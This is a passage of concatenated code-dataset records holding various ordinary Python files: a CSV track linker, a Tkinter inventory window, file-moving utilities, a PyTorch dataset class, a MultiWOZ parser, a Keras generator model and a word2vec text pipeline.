print(cnt)\r\n break\r\n else:\r\n x = x-dx[d]\r\n y = y-dy[d]","repo_name":"LSC18/FOSCAR2023","sub_path":"백준/Gold/14503. 로봇 청소기/로봇 청소기.py","file_name":"로봇 청소기.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"41634403033","text":"#!/usr/bin/env python\n\n# Reads a set of CSV files, with its respective brightfield or meiotic stage\n# coordinates and annotation, transforming them into linked CSV files\n\nfrom tqdm import tqdm\nfrom rtree import index\nfrom rtree.index import Rtree\nimport pandas as pd\nimport argparse\nimport os\nimport numpy as np\n\n\nNUM_TO_LABEL = {}\n\n\ndef link_particles_to_coordinates(part, coord, lp):\n part[args.feature] = \"_none_\"\n # Query particles against the index\n for index, row in part.iterrows():\n part.loc[index, args.feature] = \";\".join(list(map(NUM_TO_LABEL.get, coord.intersection(\n (float(row[lp[0]]), float(row[lp[2]]), float(row[lp[1]]), float(row[lp[3]]))\n ))))\n return part\n\n\ndef create_index(coord, lc):\n p = index.Property()\n idx = index.Index(properties=p)\n # Create the index for feature coordinates\n for i, row in coord.iterrows():\n NUM_TO_LABEL[i] = row[\"label\"]\n idx.add(i, [float(row[lc[0]]), float(row[lc[2]]), float(row[lc[1]]), float(row[lc[3]])])\n\n return idx\n\n\ndef filename_transform(path, old, new, coordir):\n dname = os.path.dirname(os.path.realpath(path))\n if len(coordir) != 0:\n dname = coordir\n fname = os.path.basename(os.path.realpath(path))\n\n for i, o in enumerate(old):\n fname = fname.replace(o, new[i])\n return dname + \"/\" + fname\n\n\ndef remove_extension(fname):\n new_fname = os.path.splitext(fname)[0]\n return new_fname\n\n\ndef open_file(filename):\n try:\n df = pd.read_csv(filename, header=0)\n return True, df\n except:\n return False, []\n\n\n# Argument parsing function\ndef cmdline_args():\n # Make parser object\n p = argparse.ArgumentParser(\n description=\"\"\"\n This program allows labeling of CSV files out from Tronos-ReadFile, \n labeled with respect to a coordinates file from a Tronos-ReadFile:Tracking\n pipeline. Model labels will be added as a column, as well as features derived from\n the object position and size (XY, center, size), if applicable.\n \"\"\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n )\n\n p.add_argument(\"-s\", \"--source\", nargs=\"+\", help=\"Source *.[C|T]SV files to link\")\n p.add_argument(\n \"-o\",\n \"--outdir\",\n nargs=\"+\",\n help=\"Destination directory for the new *_linked.[C|T]SV files\",\n )\n p.add_argument(\n \"-i\",\n \"--coordir\",\n type=str,\n help=\"Source coordinates directory for the *_coordinates.[C|T]SV files\",\n )\n p.add_argument(\"-d\", \"--namedel\", nargs=\"+\", help=\"Filename deletion key\")\n p.add_argument(\"-a\", \"--nameadd\", nargs=\"+\", help=\"Filename addition key\")\n p.add_argument(\n \"-c\", \"--category\", help=\"Name for the analysis (example: wt_cell)\"\n )\n p.add_argument(\n \"--feature\",\n type=str,\n help=\"Feature name, added as the column name\",\n default=\"label\",\n )\n p.add_argument(\n \"--clink\",\n nargs=4,\n help=\"Coordinate names for the R-tree; must be the area bounds\",\n default = [\"x_1\", \"x_2\", \"y_1\", \"y_2\"]\n )\n p.add_argument(\n \"--plink\",\n nargs=4,\n help=\"Particle coordinate names in same order as --clink; may be a centroid\",\n default = [\"x\", \"x\", \"y\", \"y\"]\n )\n p.add_argument(\"--first\", action=\"store_true\", help=\"Save destination coordinates from single-first frame\")\n p.add_argument(\n \"--sortby\", type=str, help=\"Enable sorting of the final table\", default=None\n )\n return p.parse_args()\n\n\nif __name__ == \"__main__\":\n args = cmdline_args()\n for filename in tqdm(args.source):\n correct, df_partic = open_file(filename)\n if not correct:\n print(\"[ERROR] Could not open {}\".format(filename))\n continue\n df_partic[\"category\"] = args.category\n df_partic.drop_duplicates(subset=None, keep=\"first\", inplace=False)\n correct, df_coords = open_file(\n filename_transform(filename, args.namedel, args.nameadd, args.coordir)\n )\n if not correct:\n print(\"[ERROR] Could not find coordinate file for {}\".format(filename))\n continue\n\n df_partic_time = df_partic.sort_values(by=[\"frame\"], kind=\"mergesort\")\n result = pd.DataFrame()\n\n for t in df_partic_time[\"frame\"].unique():\n NUM_TO_LABEL = {}\n df_coords_time = df_coords[df_coords.loc[:][\"frame\"] == (t - 1)]\n coords = create_index(df_coords_time, args.clink)\n if args.first:\n df_partic_coords = link_particles_to_coordinates(df_partic_time, coords, args.plink)\n result = result.append(df_partic_coords)\n break\n df_partic_coords = link_particles_to_coordinates(df_partic_time[df_partic_time.loc[:][\"frame\"] == t], coords, args.plink)\n result = result.append(df_partic_coords)\n\n if args.sortby is not None:\n try:\n result = result.sort_values(by=[args.sort], kind=\"mergesort\")\n except Exception:\n print(\n \"ERROR: Could not sort the dataframe by the specified column {}\".format(\n args.sortby\n )\n )\n\n result.to_csv(\n remove_extension(filename_transform(filename, [], [], args.outdir[0]))\n + \"_linked.csv\",\n header=True,\n index=False,\n )\n pass","repo_name":"danilexn/tronos","sub_path":"tronos/track-labeling.py","file_name":"track-labeling.py","file_ext":"py","file_size_in_byte":5470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"25885155212","text":"import tkinter as tk\n\nclass InventoryWindow:\n def __init__(self):\n self.root = tk.Toplevel()\n self.root.title(\"Inventory\")\n \n # Weapons\n self.weapon_labels = []\n self.weapon_buttons = []\n \n self.weapon_frame = tk.Frame(self.root)\n self.weapon_frame.pack()\n \n # Add weapons to the inventory\n self.add_weapon(\"Weapon 1\", 10, 50)\n self.add_weapon(\"Weapon 2\", 20, 100)\n # Add more weapons...\n \n # Keys\n self.key_labels = []\n self.key_buttons = []\n \n self.key_frame = tk.Frame(self.root)\n self.key_frame.pack()\n \n # Add keys to the inventory\n self.add_key(0, 200)\n self.add_key(1, 300)\n # Add more keys...\n \n # Armors\n self.armor_labels = []\n self.armor_buttons = []\n \n self.armor_frame = tk.Frame(self.root)\n self.armor_frame.pack()\n \n # Add armors to the inventory\n self.add_armor(1, 200)\n self.add_armor(2, 400)\n # Add more armors...\n \n # Healing Pads\n self.healing_pad_labels = []\n self.healing_pad_buttons = []\n \n self.healing_pad_frame = tk.Frame(self.root)\n self.healing_pad_frame.pack()\n \n # Add healing pads to the inventory\n self.add_healing_pad(100)\n self.add_healing_pad(150)\n # Add more healing pads...\n \n # Close Button\n self.close_button = tk.Button(self.root, text=\"Close Inventory\", command=self.close_inventory)\n self.close_button.pack()\n \n def add_weapon(self, name, damage, price):\n weapon_label = tk.Label(self.weapon_frame, text=name)\n weapon_label.pack(side=tk.LEFT)\n self.weapon_labels.append(weapon_label)\n \n damage_label = tk.Label(self.weapon_frame, text=f\"Damage: {damage}\")\n damage_label.pack(side=tk.LEFT)\n self.weapon_labels.append(damage_label)\n \n price_label = tk.Label(self.weapon_frame, text=f\"Price: {price}\")\n price_label.pack(side=tk.LEFT)\n self.weapon_labels.append(price_label)\n \n use_button = tk.Button(self.weapon_frame, text=\"Use\", command=lambda: self.use_weapon(name))\n use_button.pack(side=tk.LEFT)\n self.weapon_buttons.append(use_button)\n \n def add_key(self, code, price):\n key_label = tk.Label(self.key_frame, text=f\"Code: {code}\")\n key_label.pack(side=tk.LEFT)\n self.key_labels.append(key_label)\n \n price_label = tk.Label(self.key_frame, text=f\"Price: {price}\")\n price_label.pack(side=tk.LEFT)\n self.key_labels.append(price_label)\n \n use_button = tk.Button(self.key_frame, text=\"Use\", command=lambda: self.use_key(code))\n use_button.pack(side=tk.LEFT)\n self.key_buttons.append(use_button)\n \n def add_armor(self, durability, price):\n armor_label = tk.Label(self.armor_frame, text=f\"Durability: {durability}\")\n armor_label.pack(side=tk.LEFT)\n self.armor_labels.append(armor_label)\n \n price_label = tk.Label(self.armor_frame, text=f\"Price: {price}\")\n price_label.pack(side=tk.LEFT)\n self.armor_labels.append(price_label)\n \n use_button = tk.Button(self.armor_frame, text=\"Use\", command=lambda: self.use_armor(durability))\n use_button.pack(side=tk.LEFT)\n self.armor_buttons.append(use_button)\n \n def add_healing_pad(self, price):\n healing_pad_label = tk.Label(self.healing_pad_frame, text=f\"Price: {price}\")\n healing_pad_label.pack(side=tk.LEFT)\n self.healing_pad_labels.append(healing_pad_label)\n \n use_button = tk.Button(self.healing_pad_frame, text=\"Use\", command=self.use_healing_pad)\n use_button.pack(side=tk.LEFT)\n self.healing_pad_buttons.append(use_button)\n \n def use_weapon(self, name):\n # Implement the logic to use the selected weapon\n pass\n \n def use_key(self, code):\n # Implement the logic to use the selected key\n pass\n \n def use_armor(self, durability):\n # Implement the logic to use the selected armor\n pass\n \n def use_healing_pad(self):\n # Implement the logic to use the healing pad\n pass\n \n def close_inventory(self):\n self.root.destroy()\n\n# Create an instance of the InventoryWindow class\ninventory_window = InventoryWindow()\n","repo_name":"nourelattug/Noureslam","sub_path":"inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":4490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33609527869","text":"#coding=utf-8\nimport os\nimport shutil\nimport traceback\n\nfrom numpy import arange\n \n \ndef move_file(src_path, dst_path, file):\n print(file)\n print ('from : ',src_path)\n print ('to : ',dst_path)\n try:\n # cmd = 'chmod -R +x ' + src_path\n # os.popen(cmd)\n f_src = os.path.join(src_path, file)\n if not os.path.exists(dst_path):\n os.mkdir(dst_path)\n f_dst = os.path.join(dst_path, file)\n shutil.move(f_src, f_dst)\n except Exception as e:\n print ('move_file ERROR: ',e)\n traceback.print_exc()\n\ndef mkdir(path):\n\tfolder = os.path.exists(path)\n\tif not folder: #判断是否存在文件夹如果不存在则创建为文件夹\n\t\tos.makedirs(path) #makedirs 创建文件时如果路径不存在会创建这个路径\n\t\tprint (\"--- new folder... ---\")\n\t\tprint (\"--- OK ---\")\n\telse:\n\t\tprint (\"--- There is this folder! ---\")\n\t\t\n\npath = \"/home/bo/桌面/LSVT/train_32/\"\ndatanames = os.listdir(path)\nlist = []\nfor i in datanames:\n list.append(i)\n# print(list)\n\ndest_path = \"/home/bo/桌面/LSVT/train/\"\n\nindex = 0\ni = 0\nnew_file = \"\"\nfor img in list:\n\n if index % 100 == 0:\n\n new_file = dest_path + str(i)\n mkdir(new_file)\n i=i+1\n\n move_file(path,new_file,img)\n\n index = index + 1\n","repo_name":"luckpoy/PaperCode","sub_path":"data_trans/unamed_datasets_split_pic.py","file_name":"unamed_datasets_split_pic.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25128657313","text":"from rich import print as r\r\nimport logging\r\nlogging.basicConfig(filename='employee.log',level=logging.INFO,\r\n format='%(asctime)s:%(levelname)s:%(message)s')\r\n\r\n\r\n\r\nclass Employee:\r\n def __init__(self,first,last):\r\n self.first=first\r\n self.last=last\r\n self.val=0\r\n\r\n logging.info('created employee: {}-{}'.format(self.first,self.last))\r\n\r\n @property\r\n def email(self):\r\n return '{}.{}@email.com'.format(self.first, self.last)\r\n\r\n @property\r\n def fname(self):\r\n return '{} {}'.format(self.first,self.last)\r\n\r\nemp_1=Employee('John','Smitch')\r\nemp2=Employee('Corey','Schafer')\r\nemp3=Employee('jane','doo')\r\n\r\nr(100)","repo_name":"Pritish-2001/ContextManager-and-rich.","sub_path":"cb.py","file_name":"cb.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28957794299","text":"from tqdm.auto import tqdm\nfrom torch.utils.data import Dataset\nfrom os.path import exists\nimport pandas as pd\nimport numpy as np\nfrom torchvision.datasets.folder import default_loader\nimport torch\n\nclass Dataset(Dataset):\n def __init__(self, label_path, transform=None, transform_flag=True):\n self._image_paths = []\n self._labels = []\n self.indices = []\n self._label_names = {}\n self.transform = transform\n self.transform_flag = transform_flag\n\n # Reading the dataframe\n df = pd.DataFrame()\n for path in label_path:\n df_ = pd.read_csv(path)\n df = df.append(df_)\n\n #df['labels'] = df['labels'].apply(self.group_labels)\n df = df.fillna(' ')\n df = df[df['labels']!=' ']\n self._image_paths = df['paths'].to_list()\n self._labels = df['labels'].to_list()\n for i,labels in enumerate(list(set(self._labels))):\n self._label_names['label'+str(i)]=labels\n\n def __len__(self):\n return len(self._image_paths)\n\n def __getitem__(self, idx):\n img = default_loader(self._image_paths[idx])\n if self.transform is not None and self.transform_flag:\n img = self.transform(img)\n \n labels = np.array(self._labels[idx]).astype(np.float32)\n self.indices.append(idx)\n \n return img, labels\n \n def get_mean_std(self):\n images = []\n for img, label in self:\n img = np.array(img)\n images.append(img)\n images = np.array(images)\n print(images.shape)\n mean = images.mean(axis=(0,2,3))\n std = images.std(axis=(0,2,3))\n\n return mean, std\n\n def get_class_weights(self):\n class_count = self.get_class_distribution()\n class_freq = class_count / np.sum(class_count)\n\n class_weights = 1.0 / class_freq\n norm_weights = class_weights / np.sum(class_weights)\n\n return norm_weights\n\n def get_class_distribution(self):\n return np.bincount(self._labels)\n\n def get_labels(self):\n labels = np.array(self._labels).astype(np.float32)\n \n return labels\n \n def group_labels(self, n):\n try:\n n = float(n)\n if n<1:\n return 0\n else:\n return 1\n except:\n return ' '","repo_name":"nspunn1993/SkeletonCodes","sub_path":"pytorch_classification/data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"5911690056","text":"def solution(operations):\n answer = []\n\n for op in operations:\n cmd, val = op.split()\n\n if cmd == 'I':\n answer.append(int(val))\n elif cmd == 'D' and len(answer) != 0:\n if val == '1':\n answer.remove(max(answer))\n else:\n answer.remove(min(answer))\n\n if len(answer) == 0:\n answer = [0]\n\n return [max(answer), min(answer)]\n\n\nprint(solution([\"I 16\", \"D 1\"]))\nprint(solution([\"I 7\", \"I 5\", \"I -5\", \"D -1\"]))\n","repo_name":"vumbumy/programmers","sub_path":"42628.py","file_name":"42628.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43005958803","text":"# -*- coding: utf8 -*-\nimport os\nimport json\n# from termcolor import colored\nimport random\nimport re\n\n\n\nclass MultiWOZParser:\n\n def __init__(self, directory=\"\"):\n \"\"\"\n Downloads the MultiWOZ-2 data set and stores all the interesting file names.\n This does not load the data into RAM.\n :param directory:\n \"\"\"\n self.directory = directory\n\n self.data_file_name = os.path.abspath(\n os.path.join(directory, \"data.json\")\n )\n self.ontology_file_name = os.path.abspath(\n os.path.join(directory, \"ontology.json\")\n )\n self.acts_file_name = os.path.abspath(\n os.path.join(directory, \"dialogue_acts.json\")\n )\n self.testlist_file_name = os.path.abspath(\n os.path.join(directory, \"testListFile.json\")\n )\n self.vallist_file_name = os.path.abspath(\n os.path.join(directory, \"valListFile.json\")\n )\n\n assert os.path.exists(self.data_file_name)\n assert os.path.exists(self.acts_file_name)\n assert os.path.exists(self.testlist_file_name)\n assert os.path.exists(self.vallist_file_name)\n\n self._data = None\n self._ontology = None\n self._names = None\n self._acts = None\n self._test_list = None\n self._validation_list = None\n self._domain_substitute = None\n\n\n @property\n def data(self):\n # Load data on demand\n if self._data is None:\n with open(self.data_file_name, \"r\") as read_file:\n self._data = json.load(read_file)\n\n # Return the data\n return self._data\n\n @property\n def ontology(self):\n # Load data on demand\n if self._ontology is None:\n with open(self.ontology_file_name, \"r\") as read_file:\n self._ontology = json.load(read_file)\n\n # Return the data\n return self._ontology\n\n @property\n def story_names(self):\n if self._names is None:\n self._names = list(self.data)\n return self._names\n\n @property\n def acts(self):\n # Load data on demand\n if self._acts is None:\n with open(self.acts_file_name, \"r\") as read_file:\n self._acts = json.load(read_file)\n\n # Return the data\n return self._acts\n\n @property\n def validation_list(self):\n # Load data on demand\n if self._validation_list is None:\n with open(self.vallist_file_name, \"r\") as read_file:\n self._validation_list = read_file.read().split()\n\n # Return the data\n return self._validation_list\n\n @property\n def test_list(self):\n # Load data on demand\n if self._test_list is None:\n with open(self.testlist_file_name, \"r\") as read_file:\n self._test_list = read_file.read().split()\n\n # Return the data\n return self._test_list\n\n def split_punctuation(self, sentence):\n s1 = ' '.join(re.sub(r'([\\w])([,.!?])([^\\w])', r'\\1 \\2 \\3 ', sentence).split())\n # process the end of line\n return ' '.join(re.sub(r'([\\w])([,.!?])$', r'\\1 \\2 ', s1).split())\n\n def get_action_sentences(self):\n val_domain_list = ['attraction', 'restaurant', 'hotel', 'taxi']\n domain_action_sents = {} #{'attraction': {}, 'restaurant': {}, 'hotel': {}, 'taxi': {}}\n for name, dialog in self.data.items():\n log = dialog['log']\n num_turns = len(log)\n\n name = name[:-5]\n\n # story = f'## story_{name}' + '\\n'\n # print(colored(f'## story_{name}', 'green'))\n\n count_usr = 0 # How often the user spoke\n count_wiz = 0 # How often the wizard replied (consecutive actions count as one)\n\n for step in log:\n text = step['text']\n text = self.split_punctuation(text)\n if len(step['metadata']) == 0:\n # user turn\n count_usr += 1\n else:\n # wizard turn\n count_wiz += 1\n\n # parse wizard action\n if str(count_wiz) in self.acts[name]:\n action_list = self.acts[name][str(count_wiz)]\n\n if type(action_list) is not dict:\n if type(action_list) is str and action_list == \"No Annotation\":\n\n continue\n for base_action, slot_list in action_list.items():\n if '-' in base_action:\n domain, action_name = base_action.split('-')\n domain, action_name = domain.lower(), action_name.lower()\n else:\n continue\n if domain not in domain_action_sents:\n domain_action_sents[domain] = {}\n for slot in slot_list:\n slot_name = slot[0].lower()\n intent = action_name + '_' + slot_name\n if intent not in domain_action_sents[domain]:\n domain_action_sents[domain][intent] = set()\n\n domain_action_sents[domain][intent].add(text)\n\n output_dir = '../../MULTIWOZ2.1'\n fil_domain = {}\n for d in val_domain_list:\n if d in domain_action_sents:\n # print(d, domain_action_sents[d].keys())\n fil_domain[d] = list(sorted(domain_action_sents[d].keys()))\n # print(fil_domain[d].keys())\n # with open(os.path.join(output_dir, 'multiwoz_domain_intent_sents.json'), 'w', encoding='utf8') as fd:\n # json.dump(fil_domain, fd)\n print(fil_domain)\n\n # bahasa intent\n bahasa_dir = '../../BahasaWOZ/MULTIWOZ_BAHASA/annotations/formatted_data/bahasa'\n bahasa_domain_intent = {}\n for d in val_domain_list:\n intent_list = []\n with open(os.path.join(bahasa_dir, d, 'vocab.intent'), 'r', encoding='utf8') as fd:\n for l in fd:\n l = l.strip()\n if l != '':\n intent_list.append(l)\n bahasa_domain_intent[d] = intent_list\n all_domain_intent = {'multiwoz': fil_domain, 'bahasawoz': bahasa_domain_intent}\n with open(os.path.join('./', 'en_ba_domain_intent.json'), 'w', encoding='utf8') as fd:\n json.dump(all_domain_intent, fd)\n\n\n\nif __name__ == '__main__':\n parser = MultiWOZParser(directory='../../MULTIWOZ2.1')\n parser.get_action_sentences()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"luckyRookies/bahasa_data_processing","sub_path":"action_parser_mul.py","file_name":"action_parser_mul.py","file_ext":"py","file_size_in_byte":6752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72921022176","text":"class Solution:\n\tdef removeElement(self, nums, val):\n\t\t\"\"\"\n\t\t:type nums: List[int]\n\t\t:type val: int\n\t\t:rtype: int\n\t\t\"\"\"\n\t\tcount = 0\n\t\tfor i, value in enumerate(nums):\n\t\t\tprint(nums)\n\t\t\tif value == val:\n\t\t\t\tnums[i] = -1\n\t\twhile -1 in nums:\n\t\t\tnums.remove(-1)\n\t\t\tprint(nums)\n\t\treturn len(nums)\n\n\n\t\t\t\t\n","repo_name":"BhavanaRamakrishna/Leetcode","sub_path":"Remove Element.py","file_name":"Remove Element.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7811166257","text":"\r\n# Lista variabili globali \r\n\r\nimport json\r\n\r\ndef globalInitialization():\r\n global alive, listaStazioni, nTotStazioni, listaAGV#, listaGui\r\n alive = True\r\n\r\n nTotStazioni = [8,3,2]\r\n listaStazioni = [None]*3\r\n for j in range(3):\r\n listaStazioni[j] = [True]*(nTotStazioni[j]+1)\r\n \r\n \r\n listaAGV = []\r\n nListe = 3\r\n for i in range(nListe):\r\n l = []\r\n listaAGV.append(l)\r\n\r\n \r\n","repo_name":"MattPero96/manifattura_P3","sub_path":"ServerMQTT3_0TEST/gvServer.py","file_name":"gvServer.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28595795622","text":"food_in_kg = float(input())\nhay_in_kg = float(input())\ncover_in_kg = float(input())\nweight_in_kg = float(input())\n\nfood_gr = food_in_kg * 1000\nhay_gr = hay_in_kg * 1000\ncover_gr = cover_in_kg * 1000\nweight_gr = weight_in_kg * 1000\n\ndays = 1\ngo_to_store = False\n\nwhile True:\n if days == 31:\n break\n food_gr -= 300\n if days % 2 == 0:\n hay_gr -= (5 / 100) * food_gr\n if days % 3 == 0:\n cover_gr -= (1 / 3) * weight_gr\n if food_gr <= 0 or hay_gr <= 0 or cover_gr <= 0:\n go_to_store = True\n break\n days += 1\n\nif go_to_store:\n print(f\"Merry must go to the pet store!\")\nelse:\n print(f\"Everything is fine! Puppy is happy! Food: {(food_gr / 1000):.2f}, Hay: {(hay_gr / 1000):.2f}, Cover: {(cover_gr / 1000):.2f}.\")","repo_name":"rayapetkova/SoftUni_Python","sub_path":"2. Python Fundamentals/MID EXAMS/04. Programming Fundamentals Mid Exam/01_guinea_pig.py","file_name":"01_guinea_pig.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"34"} +{"seq_id":"35744002434","text":"from keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Reshape\nfrom keras.layers.core import Activation\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.convolutional import UpSampling2D\nfrom keras.layers.convolutional import Convolution2D\nfrom keras.layers.core import Flatten\nfrom keras.optimizers import Adam\nfrom keras.utils import np_utils\nfrom keras import backend as K\nimport numpy as np\nimport sys\nimport glob\nfrom PIL import Image\nimport os\nimport argparse\n\nsys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)),\n '../deep-learning-models'))\nimport vgg16\n\nNUM_BATCH = 5\n\n\ndef generator_model():\n model = Sequential()\n model.add(Dense(input_dim=100, output_dim=256 * 256 * 3))\n model.add(BatchNormalization(mode=2))\n model.add(Activation('relu'))\n model.add(Reshape((256, 256, 3)))\n model.add(UpSampling2D(size=(2, 2)))\n model.add(Convolution2D(512, 5, 5, border_mode='same'))\n model.add(BatchNormalization(mode=2))\n model.add(Activation('relu'))\n model.add(UpSampling2D(size=(2, 2)))\n model.add(Convolution2D(256, 5, 5, border_mode='same'))\n model.add(BatchNormalization(mode=2))\n model.add(Activation('relu'))\n model.add(UpSampling2D(size=(2, 2)))\n model.add(Convolution2D(128, 5, 5, border_mode='same'))\n model.add(BatchNormalization(mode=2))\n model.add(Activation('relu'))\n model.add(UpSampling2D(size=(2, 2)))\n model.add(Convolution2D(3, 5, 5, border_mode='same'))\n model.add(Activation('tanh'))\n return model\n\n\ndef generator_with_classifier(generator, classifier):\n model = Sequential()\n model.add(generator)\n classifier.trainable = False\n model.add(classifier)\n\n return model\n\n\ndef generate(filepath, output_dir, BATCH_SIZE):\n generator = generator_model()\n adam = Adam(lr=0.0002, beta_1=0.5, beta_2=0.999, epsilon=1e-08)\n generator.compile(loss='categorical_crossentropy', optimizer=adam)\n generator.load_weights(filepath)\n\n noise = np.zeros((BATCH_SIZE, 100))\n for i in range(BATCH_SIZE):\n noise[i, :] = np.random.uniform(-1, 1, 100)\n\n print('Generating images..')\n generated_images = [np.rollaxis(img, 0, 3)\n for img in generator.predict(noise)]\n\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n\n for index, img in enumerate(generated_images):\n img = img * 127.5\n img = img.astype(np.uint8)\n img = Image.fromarray(img)\n img.save(os.path.join(output_dir, \"{0}.jpg\".format(index)))\n\n\ndef train(target_class, BATCH_SIZE):\n\n generator = generator_model()\n classifier = vgg16.VGG16(include_top=True, weights='imagenet')\n classifier_on_generator = generator_with_classifier(\n generator=generator, classifier=classifier)\n\n adam = Adam(lr=0.0002, beta_1=0.5, beta_2=0.999, epsilon=1e-08)\n generator.compile(loss='categorical_crossentropy', optimizer=adam)\n classifier_on_generator.compile(\n loss='categorical_crossentropy', optimizer=adam)\n\n for epoch in range(NUM_BATCH):\n noise = np.zeros((BATCH_SIZE, 100))\n for i in range(BATCH_SIZE):\n noise[i, :] = np.random.uniform(-1, 1, 100)\n\n y = np_utils.to_categorical([target_class] * BATCH_SIZE, 1000)\n\n g_loss = classifier_on_generator.train_on_batch(noise, y)\n print(\"Generator loss: \", g_loss)\n\n if epoch == NUM_BATCH - 1:\n print('saving weights...')\n filename = \"{0}_generator.h5\".format(target_class)\n generator.save_weights(filename, True)\n\n generate(filename, target_class, 10)\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--target_class\", type=int, required=True)\n parser.add_argument(\"--batch_size\", type=int, default=100)\n parser.add_argument(\"--mode\", type=str, default=\"train\")\n args = parser.parse_args()\n return args\n\nif __name__ == '__main__':\n args = get_args()\n if args.mode not in (\"train\", \"generate\"):\n raise ValueError(\"mode must be 'train' or 'generate'\")\n train(args.target_class, args.batch_size)\n","repo_name":"RyotaKatoh/keras-CNN-cheater","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":4224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30547385115","text":"from gensim.models import word2vec\nimport numpy as np\nimport re\nimport os\nfrom keras.preprocessing.sequence import pad_sequences\nfrom sklearn.preprocessing import LabelEncoder\nfrom keras.utils import to_categorical\nimport sklearn.utils\nfrom sklearn.model_selection import train_test_split\nfrom ThreadsafeIter import threadsafe_generator\nfrom StoreFiles import StoreFiles\nimport pandas as pd\nimport gensim\nimport keras\nfrom keras.preprocessing.text import Tokenizer\nimport pickle\nfrom Constantes_public import model_files_folder\n\nfrom Log import logger\n\n\nclass TeamPipeline:\n def __init__(self):\n pass\n\n # Remove labels that are not enough represented\n @staticmethod\n def drop_unrepresented_labels(df, label_col, percentage_drop=0.1):\n categories_counts = pd.value_counts(df[label_col])\n reduced_categories_counts = categories_counts[(categories_counts / categories_counts.sum())*100.\n > percentage_drop]\n percentage_keep = reduced_categories_counts.sum() / categories_counts.sum() * 100\n logger.info(\"We keep {:.2f} % of the data and {} labels\".format(percentage_keep,\n len(reduced_categories_counts)))\n result = df[df[label_col].isin(reduced_categories_counts.index)]\n result = result.reset_index(drop=True)\n return result\n\n # Method only to remove Capital letters and split the text by every non letter\n @staticmethod\n def split_and_lower(text):\n cleaned_sentence = []\n words = re.split(\"\\W\", text)\n for word in words:\n if word != '':\n if not word.isupper():\n word = word.lower()\n cleaned_sentence.append(word)\n return cleaned_sentence\n\n # apply Word2vec Model by gensim\n def get_word2vec_model(self, text_serie, **kwargs):\n sf = StoreFiles('model')\n fname = sf.get_fname(type=\"word2vec\", **kwargs)\n if fname is not None:\n model = word2vec.Word2Vec.load(os.path.join(model_files_folder, fname))\n\n else:\n logger.debug('training word2vec ...')\n sentences = []\n sentences.extend(text_serie.fillna('').apply(self.split_and_lower))\n import time\n t1 = time.time()\n model = word2vec.Word2Vec(sentences, **kwargs)\n # size=100, window=5, min_count=100, workers=8, hs=1, sg=1, iter=5)\n logger.info('time running word2vec model : {}'.format(time.time() - t1))\n # if save_model:\n fname = sf.fname_and_store(type=\"word2vec\", **kwargs)\n model.save(os.path.join(model_files_folder, fname))\n return model, fname\n\n # method which allows to use an embedding layer directly in the model\n def get_tokenizer(self, text_serie, **kwargs):\n sf = StoreFiles('model')\n fname = sf.get_fname(type=\"tokenizer\", **kwargs)\n if fname is not None:\n try:\n tokenizer = pickle.load(open(fname, 'rb'))\n except FileNotFoundError as e:\n logger.error(\"trying to reload the file\")\n tokenizer = pickle.load(open(fname, 'rb'))\n\n else:\n logger.info('Tokenizer ... ')\n model_filename = sf.fname_and_store(type=\"tokenizer\", **kwargs)\n tokenizer = Tokenizer()\n tokenizer.fit_on_texts(text_serie)\n pickle.dump(tokenizer, open(os.path.join(model_files_folder, model_filename), 'wb'))\n logger.info('Tokenized')\n\n return tokenizer, fname\n\n # Transform text to word embeddings to use it in the model\n def sentence_to_word2vec_embedding(self, word2vec_model, sentence):\n result = []\n if type(sentence) is float:\n return result\n sent_split = sentence.split()\n for word in sent_split:\n try:\n result.append(word2vec_model.wv.word_vec(word))\n except KeyError:\n continue\n # if len(result) == 0:\n # result.append(np.zeros(word2vec_model.layer1_size))\n return result\n\n # encode label, for example if we have 8 teams, and we want to change the team 2 (2) -> becomes (0,0,1,0,0,0,0,0)\n def encode_label(self, labels, categorical=True):\n label_encoder = LabelEncoder()\n labels = label_encoder.fit_transform(labels)\n if categorical:\n labels = to_categorical(labels)\n return labels, label_encoder\n\n # allow to separate in validation and training set\n def train_valid_split(self, X, y, test_size=0.2, shuffle=True):\n assert len(X) == len(y), 'X and y in train valid split must have same length'\n if shuffle:\n X_train, X_valid, y_train, y_valid = train_test_split(X, y, test_size=test_size)\n else:\n if test_size > 1:\n idx = test_size\n else:\n idx = int(len(X) * (1 - test_size))\n X_train, X_valid = X[:idx], X[idx:]\n y_train, y_valid = y[:idx], 